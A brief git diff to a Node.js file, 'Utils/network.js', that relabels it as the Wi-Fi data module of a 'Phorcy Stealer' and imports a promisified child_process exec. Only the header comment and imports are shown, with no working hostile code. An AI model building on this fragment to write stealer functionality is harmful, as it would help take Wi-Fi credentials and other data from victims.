diff --git a/Utils/network.js b/Utils/network.js index 29ec0f5..54dc360 100644 --- a/Utils/network.js +++ b/Utils/network.js @@ -1,4 +1,5 @@ -/// coded by syntheticuhh on discord +/// coded by syntheticuhh +/// WIFI-DATA FOR PHORCY STEALER const util = require('util'); const exec = util.promisify(require('child_process').exec);